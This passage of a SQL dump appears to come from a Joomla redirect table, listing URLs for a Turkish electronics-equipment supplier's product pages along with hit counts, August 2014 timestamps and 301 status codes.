23:59:37','0000-00-00 00:00:00',301),(263,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=149&Itemid=150&lang=en','','','',14,0,'2014-08-04 00:03:13','0000-00-00 00:00:00',301),(264,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=category&id=39:lehimleme&Itemid=57&layout=default&lang=en','','','',17,0,'2014-08-04 00:16:46','0000-00-00 00:00:00',301),(265,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=36&Itemid=37','','','',3,0,'2014-08-04 00:23:48','0000-00-00 00:00:00',301),(266,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=150&Itemid=151&lang=en','','','',26,0,'2014-08-04 00:25:33','0000-00-00 00:00:00',301),(267,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=125&Itemid=131&lang=tr','','','',6,0,'2014-08-04 00:30:28','0000-00-00 00:00:00',301),(268,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=category&id=58:dusuk-hizli-smd-dizgi&Itemid=149&layout=default&lang=tr','','','',3,0,'2014-08-04 00:35:41','0000-00-00 00:00:00',301),(269,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=115:kutulanmis-hava-air&catid=40:temizleme&Itemid=126&lang=tr','','','',5,0,'2014-08-04 00:42:29','0000-00-00 00:00:00',301),(270,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=145&Itemid=147&lang=tr','','','',3,0,'2014-08-04 00:56:36','0000-00-00 00:00:00',301),(271,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=category&id=41&Itemid=55&lang=en','','','',24,0,'2014-08-04 01:04:37','0000-00-00 00:00:00',301),(272,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=117&Itemid=128&lang=en','','','',2,0,'2014-08-04 01:18:26','0000-00-00 00:00:00',301),(273,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=71&Itemid=79&lang=tr','','','',15,0,'2014-08-04 01:25:30','0000-00-00 00:00:00',301),(274,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=108:yuksek-guclu-flux-giderici-spr&catid=40:temizleme&Itemid=119&lang=tr','','','',19,0,'2014-08-04 01:32:32','0000-00-00 00:00:00',301),(275,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=41&Itemid=55&lang=tr','','','',4,0,'2014-08-04 01:37:08','0000-00-00 00:00:00',301),(276,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=84&Itemid=96&lang=tr','','','',1,0,'2014-08-04 01:39:42','0000-00-00 00:00:00',301),(277,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=116:sogutucu-sprey-frz&catid=40:temizleme&Itemid=127&lang=tr','','','',1,0,'2014-08-04 01:51:10','0000-00-00 00:00:00',301),(278,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=146:manual-printer&catid=57:screen-printer&Itemid=148&lang=en','','','',12,0,'2014-08-04 01:51:12','0000-00-00 00:00:00',301),(279,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=120&Itemid=116&lang=en','','','',1,0,'2014-08-04 01:54:42','0000-00-00 00:00:00',301),(280,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=98&Itemid=109&lang=en','','','',7,0,'2014-08-04 01:55:53','0000-00-00 00:00:00',301),(281,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=87&Itemid=103&lang=en','','','',1,0,'2014-08-04 01:55:57','0000-00-00 00:00:00',301),(282,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=98&Itemid=109&lang=tr','','','',1,0,'2014-08-04 01:59:43','0000-00-00 00:00:00',301),(283,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=167:lr4&catid=41:smd-firin&Itemid=163&lang=tr','','','',6,0,'2014-08-04 02:07:02','0000-00-00 00:00:00',301),(284,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=167:lr4&catid=41:smd-firin&Itemid=163&lang=tr','','','',4,0,'2014-08-04 02:08:56','0000-00-00 00:00:00',301),(285,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=157:spartan-8s8d&catid=44:pota&Itemid=158&lang=tr','','','',10,0,'2014-08-04 02:12:25','0000-00-00 00:00:00',301),(286,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=122&Itemid=129&lang=en','','','',2,0,'2014-08-04 02:14:32','0000-00-00 00:00:00',301),(287,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=167&Itemid=163&lang=en','','','',28,0,'2014-08-04 02:14:34','0000-00-00 00:00:00',301),(288,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=36&Itemid=37&lang=tr','','','',4,0,'2014-08-04 02:17:09','0000-00-00 00:00:00',301),(289,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=167&Itemid=163&lang=tr','','','',8,0,'2014-08-04 02:22:02','0000-00-00 00:00:00',301),(290,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=91:osai-neo&catid=1:son-haberler&Itemid=28&lang=en','','','',3,0,'2014-08-04 02:22:03','0000-00-00 00:00:00',301),(291,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=71&Itemid=79&lang=tr','','','',1,0,'2014-08-04 02:24:01','0000-00-00 00:00:00',301),(292,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=156:lf-350b&catid=44:pota&Itemid=157&lang=tr','','','',3,0,'2014-08-04 02:29:48','0000-00-00 00:00:00',301),(293,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=105&Itemid=112&lang=tr','','','',2,0,'2014-08-04 02:29:49','0000-00-00 00:00:00',301),(294,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php/en/contacts-en','','','',1,0,'2014-08-04 02:32:26','0000-00-00 00:00:00',301),(295,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=156:lf-350b&catid=44:pota&Itemid=157&lang=tr','','','',19,0,'2014-08-04 02:35:39','0000-00-00 00:00:00',301),(296,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=category&id=40&Itemid=60&lang=en','','','',1,0,'2014-08-04 02:35:40','0000-00-00 00:00:00',301),(297,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=108&Itemid=119&lang=en','','','',1,0,'2014-08-04 02:45:29','0000-00-00 00:00:00',301),(298,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=160&Itemid=161&lang=tr','','','',1,0,'2014-08-04 02:51:30','0000-00-00 00:00:00',301),(299,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=140&Itemid=142&lang=en','','','',2,0,'2014-08-04 02:57:28','0000-00-00 00:00:00',301),(300,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=category&id=42&Itemid=27&lang=tr','','','',29,0,'2014-08-04 03:09:29','0000-00-00 00:00:00',301),(301,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=category&id=56:rework-stasyonlari&Itemid=137&layout=default&lang=en','','','',3,0,'2014-08-04 03:15:33','0000-00-00 00:00:00',301),(302,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=category&id=36&Itemid=37&lang=en','','','',32,0,'2014-08-04 03:15:35','0000-00-00 00:00:00',301),(303,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=176:jvk1&catid=60:ikinciel&Itemid=164&lang=tr','','','',3,0,'2014-08-04 03:21:41','0000-00-00 00:00:00',301),(304,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=category&id=36&Itemid=37&lang=tr','','','',31,0,'2014-08-04 03:21:44','0000-00-00 00:00:00',301),(305,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=126&Itemid=133&lang=tr','','','',37,0,'2014-08-04 03:27:58','0000-00-00 00:00:00',301),(306,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=157&Itemid=158','','','',4,0,'2014-08-04 03:29:02','0000-00-00 00:00:00',301),(307,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=category&id=54&Itemid=114&lang=tr','','','',65,0,'2014-08-04 03:29:05','0000-00-00 00:00:00',301),(308,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=46&Itemid=62&lang=tr','','','',4,0,'2014-08-04 03:30:28','0000-00-00 00:00:00',301),(309,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=99&Itemid=43&lang=tr','','','',1,0,'2014-08-04 03:32:12','0000-00-00 00:00:00',301),(310,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=category&id=36&Itemid=37&lang=tr','','','',1,0,'2014-08-04 03:32:13','0000-00-00 00:00:00',301),(311,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=category&id=40:temizleme&Itemid=60&layout=default&lang=en','','','',83,0,'2014-08-04 03:37:07','0000-00-00 00:00:00',301),(312,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=108:yuksek-guclu-flux-giderici-spr&catid=40:temizleme&Itemid=119&lang=en','','','',1,0,'2014-08-04 03:40:44','0000-00-00 00:00:00',301),(313,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=112&Itemid=123&lang=tr','','','',9,0,'2014-08-04 03:45:17','0000-00-00 00:00:00',301),(314,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=category&id=49&Itemid=61&lang=tr','','','',1,0,'2014-08-04 03:45:17','0000-00-00 00:00:00',301),(315,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=150&Itemid=151&lang=en','','','',11,0,'2014-08-04 03:50:40','0000-00-00 00:00:00',301),(316,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=166&Itemid=144&lang=en','','','',2,0,'2014-08-04 03:55:03','0000-00-00 00:00:00',301),(317,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=150&Itemid=151&lang=en','','','',15,0,'2014-08-04 03:55:06','0000-00-00 00:00:00',301),(318,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=139:flo-master-ii&catid=56:rework-stasyonlari&Itemid=141&lang=tr','','','',3,0,'2014-08-04 03:59:35','0000-00-00 00:00:00',301),(319,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=category&id=42&Itemid=27&lang=tr','','','',2,0,'2014-08-04 04:04:04','0000-00-00 00:00:00',301),(320,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=150&Itemid=151&lang=en','','','',2,0,'2014-08-04 04:04:05','0000-00-00 00:00:00',301),(321,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=154&Itemid=156&lang=en','','','',27,0,'2014-08-04 04:08:26','0000-00-00 00:00:00',301),(322,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=147&Itemid=146&lang=tr','','','',1,0,'2014-08-04 04:16:23','0000-00-00 00:00:00',301),(323,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=154&Itemid=156&lang=tr','','','',2,0,'2014-08-04 04:16:24','0000-00-00 00:00:00',301),(324,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=category&id=60:ikinciel&Itemid=164&layout=default&lang=en','','','',63,0,'2014-08-04 04:17:07','0000-00-00 00:00:00',301),(325,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=107&Itemid=118&lang=en','','','',20,0,'2014-08-04 04:31:59','0000-00-00 00:00:00',301),(326,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=120:trident&catid=54:pcb-ve-stensil-temizleme-makineleri&Itemid=116&lang=en','','','',56,0,'2014-08-04 04:32:48','0000-00-00 00:00:00',301),(327,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=108&Itemid=119&lang=tr','','','',9,0,'2014-08-04 04:36:31','0000-00-00 00:00:00',301),(328,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=108&Itemid=119&lang=tr','','','',14,0,'2014-08-04 04:41:05','0000-00-00 00:00:00',301),(329,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=120&Itemid=116&lang=tr','','','',17,0,'2014-08-04 04:44:08','0000-00-00 00:00:00',301),(330,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=category&id=59:bolgesel-lehimleme-mak&Itemid=155&layout=default&lang=tr','','','',65,0,'2014-08-04 04:47:10','0000-00-00 00:00:00',301),(331,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=109&Itemid=120&lang=en','','','',33,0,'2014-08-04 04:50:14','0000-00-00 00:00:00',301),(332,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=category&id=40&Itemid=60&lang=tr','','','',39,0,'2014-08-04 04:50:27','0000-00-00 00:00:00',301),(333,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=157&Itemid=158&lang=en','','','',2,0,'2014-08-04 04:56:55','0000-00-00 00:00:00',301),(334,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=109&Itemid=120&lang=en','','','',29,0,'2014-08-04 04:56:58','0000-00-00 00:00:00',301),(335,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=category&id=56&Itemid=137&lang=en','','','',2,0,'2014-08-04 04:58:32','0000-00-00 00:00:00',301),(336,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=109&Itemid=120&lang=en','','','',2,0,'2014-08-04 04:58:33','0000-00-00 00:00:00',301),(337,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=109&Itemid=120&lang=tr','','','',16,0,'2014-08-04 05:03:12','0000-00-00 00:00:00',301),(338,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=81&Itemid=40&lang=en','','','',28,0,'2014-08-04 05:06:38','0000-00-00 00:00:00',301),(339,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=81&Itemid=40&lang=tr','','','',1,0,'2014-08-04 05:13:14','0000-00-00 00:00:00',301),(340,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=81&Itemid=40&lang=tr','','','',1,0,'2014-08-04 05:13:14','0000-00-00 00:00:00',301),(341,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=93&Itemid=104&lang=tr','','','',3,0,'2014-08-04 05:21:31','0000-00-00 00:00:00',301),(342,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=56&Itemid=137','','','',9,0,'2014-08-04 05:24:28','0000-00-00 00:00:00',301),(343,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=172:avb1&catid=60:ikinciel&Itemid=164&lang=tr','','','',23,0,'2014-08-04 05:25:35','0000-00-00 00:00:00',301),(344,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=126&Itemid=133&lang=en','','','',2,0,'2014-08-04 05:26:48','0000-00-00 00:00:00',301),(345,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=172:avb1&catid=60:ikinciel&Itemid=164&lang=en','','','',30,0,'2014-08-04 05:29:09','0000-00-00 00:00:00',301),(346,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=93&Itemid=104&lang=en','','','',1,0,'2014-08-04 05:30:03','0000-00-00 00:00:00',301),(347,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=172:avb1&catid=60:ikinciel&Itemid=164&lang=en','','','',3,0,'2014-08-04 05:30:04','0000-00-00 00:00:00',301),(348,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=41&Itemid=55&lang=en','','','',4,0,'2014-08-04 05:30:27','0000-00-00 00:00:00',301),(349,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=93&Itemid=104&lang=tr','','','',2,0,'2014-08-04 05:32:16','0000-00-00 00:00:00',301),(350,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=category&id=40:temizleme&Itemid=60&layout=default&lang=tr&limitstart=10','','','',1,0,'2014-08-04 05:32:18','0000-00-00 00:00:00',301),(351,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=108:yuksek-guclu-flux-giderici-spr&catid=40:temizleme&Itemid=119&lang=en','','','',11,0,'2014-08-04 05:34:31','0000-00-00 00:00:00',301),(352,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=category&id=59&Itemid=155&lang=en','','','',1,0,'2014-08-04 05:34:31','0000-00-00 00:00:00',301),(353,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=156:lf-350b&catid=44:pota&Itemid=157','','','',7,0,'2014-08-04 05:39:05','0000-00-00 00:00:00',301),(354,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=108:yuksek-guclu-flux-giderici-spr&catid=40:temizleme&Itemid=119&lang=tr','','','',1,0,'2014-08-04 05:41:10','0000-00-00 00:00:00',301),(355,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=category&id=49&Itemid=61','','','',9,0,'2014-08-04 05:43:47','0000-00-00 00:00:00',301),(356,'http://3s-technologies.com.tr/index.php?option=com_content&view=article&id=124&Itemid=130&lang=tr','','http://3s-technologies.com.tr/index.php?option=com_content&view=article&id=124&Itemid=130&lang=tr','',29,0,'2014-08-04 05:43:53','0000-00-00 00:00:00',301),(357,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=149:cs40&catid=58:dusuk-hizli-smd-dizgi&Itemid=150&lang=tr','','http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=149:cs40&catid=58:dusuk-hizli-smd-dizgi&Itemid=15','',37,0,'2014-08-04 05:43:55','0000-00-00 00:00:00',301),(358,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=108:yuksek-guclu-flux-giderici-spr&catid=40:temizleme&Itemid=119&lang=tr','','','',3,0,'2014-08-04 05:46:07','0000-00-00 00:00:00',301),(359,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=category&id=55:katalog&Itemid=1&layout=default&lang=en','','','',1,0,'2014-08-04 05:46:08','0000-00-00 00:00:00',301),(360,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=120&Itemid=116&lang=en','','','',22,0,'2014-08-04 05:46:47','0000-00-00 00:00:00',301),(361,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=category&layout=blog&id=1&Itemid=28&lang=en','','','',1,0,'2014-08-04 05:50:55','0000-00-00 00:00:00',301),(362,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=149:cs40&catid=58:dusuk-hizli-smd-dizgi&Itemid=150','','','',7,0,'2014-08-04 05:52:21','0000-00-00 00:00:00',301),(363,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=71:rl131&catid=42:th-dizgi&Itemid=79&lang=tr','','','',35,0,'2014-08-04 05:52:57','0000-00-00 00:00:00',301),(364,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=56:rework-stasyonlari&Itemid=137&layout=default','','','',8,0,'2014-08-04 05:57:07','0000-00-00 00:00:00',301),(365,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=category&id=44&Itemid=56&lang=tr','','','',1,0,'2014-08-04 05:58:51','0000-00-00 00:00:00',301),(366,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=category&layout=blog&id=1&Itemid=50&lang=tr&limitstart=5','','','',3,0,'2014-08-04 06:01:47','0000-00-00 00:00:00',301),(367,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=159:gf-c2-ht&catid=41:smd-firin&Itemid=162&lang=en','','','',6,0,'2014-08-04 06:06:38','0000-00-00 00:00:00',301),(368,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=89:neosold&catid=51:neo&Itemid=101&lang=en','','','',10,0,'2014-08-04 06:12:29','0000-00-00 00:00:00',301),(369,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=111&Itemid=122&lang=en','','','',2,0,'2014-08-04 06:13:31','0000-00-00 00:00:00',301),(370,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=166&Itemid=144&lang=tr','','http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=166&Itemid=144&lang=tr','',24,0,'2014-08-04 06:13:32','0000-00-00 00:00:00',301),(371,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=89:neosold&catid=51:neo&Itemid=101&lang=en','','','',9,0,'2014-08-04 06:14:33','0000-00-00 00:00:00',301),(372,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=80&Itemid=87&lang=tr','','','',1,0,'2014-08-04 06:15:33','0000-00-00 00:00:00',301),(373,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=145&Itemid=147&lang=en','','','',25,0,'2014-08-04 06:16:35','0000-00-00 00:00:00',301),(374,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=145&Itemid=147&lang=en','','','',4,0,'2014-08-04 06:18:34','0000-00-00 00:00:00',301),(375,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=87&Itemid=99&lang=tr','','','',11,0,'2014-08-04 06:23:29','0000-00-00 00:00:00',301),(376,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=category&id=36:orta-hizli&Itemid=37&layout=default&lang=tr','','','',14,0,'2014-08-04 06:31:47','0000-00-00 00:00:00',301),(377,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=156:lf-350b&catid=44:pota&Itemid=157&lang=en','','','',7,0,'2014-08-04 06:33:48','0000-00-00 00:00:00',301),(378,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=165:microcare&catid=1:son-haberler&Itemid=28&lang=en','','','',3,0,'2014-08-04 06:36:54','0000-00-00 00:00:00',301),(379,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=152:ls60&catid=58:dusuk-hizli-smd-dizgi&Itemid=153&lang=tr','','','',10,0,'2014-08-04 06:40:27','0000-00-00 00:00:00',301),(380,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=83&Itemid=95&lang=tr','','','',4,0,'2014-08-04 06:41:00','0000-00-00 00:00:00',301),(381,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=80:cm101&catid=43:ultra-hizli&Itemid=87','','','',13,0,'2014-08-04 06:50:27','0000-00-00 00:00:00',301),(382,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=category&id=47:aoi&Itemid=1&layout=default&lang=en','','','',2,0,'2014-08-04 06:52:26','0000-00-00 00:00:00',301),(383,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=83&Itemid=95&lang=en','','','',1,0,'2014-08-04 06:52:26','0000-00-00 00:00:00',301),(384,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=36:orta-hizli&Itemid=37&layout=default&lang=en','','','',6,0,'2014-08-04 06:54:16','0000-00-00 00:00:00',301),(385,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=86:mx350&catid=36:orta-hizli&Itemid=98&lang=tr','','','',1,0,'2014-08-04 06:57:08','0000-00-00 00:00:00',301),(386,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=category&id=42:th-dizgi&Itemid=27&layout=default&lang=tr','','','',70,0,'2014-08-04 06:57:35','0000-00-00 00:00:00',301),(387,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=category&id=47:aoi&Itemid=1&layout=default&lang=tr','','','',2,0,'2014-08-04 06:58:40','0000-00-00 00:00:00',301),(388,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=category&id=47:aoi&Itemid=1&layout=default&lang=en','','','',14,0,'2014-08-04 07:02:41','0000-00-00 00:00:00',301),(389,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=140:sharpshooter&catid=56:rework-stasyonlari&Itemid=142&lang=en','','','',6,0,'2014-08-04 07:07:00','0000-00-00 00:00:00',301),(390,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=140:sharpshooter&catid=56:rework-stasyonlari&Itemid=142&lang=en','','','',4,0,'2014-08-04 07:08:42','0000-00-00 00:00:00',301),(391,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=94&Itemid=105&lang=tr','','','',26,0,'2014-08-04 07:10:27','0000-00-00 00:00:00',301),(392,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=86:mx350&catid=36:orta-hizli&Itemid=98&lang=en','','','',27,0,'2014-08-04 07:13:00','0000-00-00 00:00:00',301),(393,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=category&id=60&Itemid=164&lang=en','','','',30,0,'2014-08-04 07:13:03','0000-00-00 00:00:00',301),(394,'http://3s-technologies.com.tr/index.php/en/contacts-en','','','',32,0,'2014-08-04 07:19:37','0000-00-00 00:00:00',301),(395,'http://www.3s-technologies.com.tr/index.php/en/contacts-en','','http://www.3s-technologies.com.tr/index.php/en/','',51,0,'2014-08-04 07:20:45','0000-00-00 00:00:00',301),(396,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=149:cs40&catid=58:dusuk-hizli-smd-dizgi&Itemid=150&lang=tr','','','',10,0,'2014-08-04 07:21:49','0000-00-00 00:00:00',301),(397,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=166&Itemid=144&lang=tr','','','',2,0,'2014-08-04 07:25:06','0000-00-00 00:00:00',301),(398,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=119:trident&catid=54:pcb-ve-stensil-temizleme-makineleri&Itemid=117&lang=tr','','','',2,0,'2014-08-04 07:25:06','0000-00-00 00:00:00',301),(399,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=151:le40&catid=58:dusuk-hizli-smd-dizgi&Itemid=152&lang=en','','','',3,0,'2014-08-04 07:28:23','0000-00-00 00:00:00',301),(400,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=88&Itemid=100&lang=en','','','',1,0,'2014-08-04 07:28:23','0000-00-00 00:00:00',301),(401,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=166&Itemid=144&lang=tr','','','',28,0,'2014-08-04 07:31:45','0000-00-00 00:00:00',301),(402,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=87:temizlik&catid=40:temizleme&Itemid=103&lang=tr','','','',7,0,'2014-08-04 07:33:05','0000-00-00 00:00:00',301),(403,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=71:rl131&catid=42:th-dizgi&Itemid=79','','','',26,0,'2014-08-04 07:33:23','0000-00-00 00:00:00',301),(404,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=category&id=42&Itemid=27&lang=tr','','','',42,0,'2014-08-04 07:38:36','0000-00-00 00:00:00',301),(405,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=126&Itemid=133&lang=tr','','','',32,0,'2014-08-04 07:40:28','0000-00-00 00:00:00',301),(406,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=112&Itemid=123&lang=tr','','','',14,0,'2014-08-04 07:42:09','0000-00-00 00:00:00',301),(407,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=84&Itemid=96&lang=en','','','',25,0,'2014-08-04 07:42:20','0000-00-00 00:00:00',301),(408,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=151&Itemid=152&lang=tr','','','',1,0,'2014-08-04 07:43:22','0000-00-00 00:00:00',301),(409,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=87:temizlik&catid=40:temizleme&Itemid=103&lang=en','','','',1,0,'2014-08-04 07:43:24','0000-00-00 00:00:00',301),(410,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=category&layout=blog&id=1&Itemid=50&lang=tr','','','',10,0,'2014-08-04 07:52:47','0000-00-00 00:00:00',301),(411,'http://www.3s-technologies.com.tr/index.php/en/soldering','','','',6,0,'2014-08-04 07:53:32','0000-00-00 00:00:00',301),(412,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=141:marksman&catid=56:rework-stasyonlari&Itemid=143&lang=en','','','',70,0,'2014-08-04 07:59:15','0000-00-00 00:00:00',301),(413,'http://3s-technologies.com.tr/index.php/en/soldering','','','',1,0,'2014-08-04 08:01:13','0000-00-00 00:00:00',301),(414,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=category&id=53&Itemid=110&lang=en','','','',8,0,'2014-08-04 08:05:14','0000-00-00 00:00:00',301),(415,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=115&Itemid=126&lang=en','','','',1,0,'2014-08-04 08:05:20','0000-00-00 00:00:00',301),(416,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=category&id=53&Itemid=110&lang=en','','','',24,0,'2014-08-04 08:09:20','0000-00-00 